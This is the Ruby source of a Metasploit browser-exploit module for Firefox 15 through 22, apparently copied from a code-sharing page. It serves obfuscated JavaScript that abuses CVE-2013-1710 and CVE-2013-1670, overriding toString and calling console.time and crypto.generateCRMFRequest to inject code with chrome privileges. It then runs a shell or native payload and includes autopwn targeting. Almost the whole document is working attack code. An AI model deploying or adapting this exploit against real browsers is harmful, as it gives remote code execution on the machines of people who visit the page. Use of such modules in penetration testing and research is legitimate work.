Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'rex/exploitation/jsobfu'
7

8
class MetasploitModule < Msf::Exploit::Remote
9
  Rank = ExcellentRanking
10

11
  include Msf::Exploit::Remote::BrowserExploitServer
12
  include Msf::Exploit::Remote::BrowserAutopwn
13
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
14

15
  autopwn_info({
16
    :ua_name    => HttpClients::FF,
17
    :ua_minver  => "15.0",
18
    :ua_maxver  => "22.0",
19
    :javascript => true,
20
    :rank       => ExcellentRanking
21
  })
22

23
  def initialize(info = {})
24
    super(update_info(info,
25
      'Name'           => 'Firefox toString console.time Privileged Javascript Injection',
26
      'Description'    => %q{
27
        This exploit gains remote code execution on Firefox 15-22 by abusing two separate
28
        Javascript-related vulnerabilities to ultimately inject malicious Javascript code
29
        into a context running with chrome:// privileges.
30
      },
31
      'License' => MSF_LICENSE,
32
      'Author'  => [
33
        'moz_bug_r_a4', # discovered CVE-2013-1710
34
        'Cody Crews',   # discovered CVE-2013-1670
35
        'joev' # metasploit module
36
      ],
37
      'DisclosureDate' => '2013-05-14',
38
      'References' => [
39
        ['CVE', '2013-1710']  # chrome injection
40
      ],
41
      'Targets' => [
42
        [
43
          'Universal (Javascript XPCOM Shell)', {
44
            'Platform' => 'firefox',
45
            'Arch' => ARCH_FIREFOX
46
          }
47
        ],
48
        [
49
          'Native Payload', {
50
            'Platform' => %w{ java linux osx solaris win },
51
            'Arch'     => ARCH_ALL
52
          }
53
        ]
54
      ],
55
      'DefaultTarget' => 0,
56
      'BrowserRequirements' => {
57
        :source  => 'script',
58
        :ua_name => HttpClients::FF,
59
        :ua_ver  => lambda { |ver| ver.to_i.between?(15, 22) }
60
      }
61
    ))
62

63
    register_options([
64
      OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", "" ])
65
    ])
66
  end
67

68
  def on_request_exploit(cli, request, target_info)
69
    send_response_html(cli, generate_html(target_info))
70
  end
71

72
  def generate_html(target_info)
73
    key = Rex::Text.rand_text_alpha(5 + rand(12))
74
    opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin
75

76
    js = js_obfuscate %Q|
77
      var opts = #{JSON.unparse(opts)};
78
      var key = opts['#{key}'];
79
      var y = {}, q = false;
80
      y.constructor.prototype.toString=function() {
81
        if (q) return;
82
        q = true;
83
        crypto.generateCRMFRequest("CN=Me", "#{Rex::Text.rand_text_alpha(5 + rand(12))}", "#{Rex::Text.rand_text_alpha(5 + rand(12))}", null, key, 1024, null, "rsa-ex");
84
        return 5;
85
      };
86
      console.time(y);
87
    |
88

89
    %Q|
90
      <!doctype html>
91
      <html>
92
        <body>
93
          <script>
94
            #{js}
95
          </script>
96
          #{datastore['CONTENT']}
97
        </body>
98
      </html>
99
    |
100
  end
101
end
102

103

104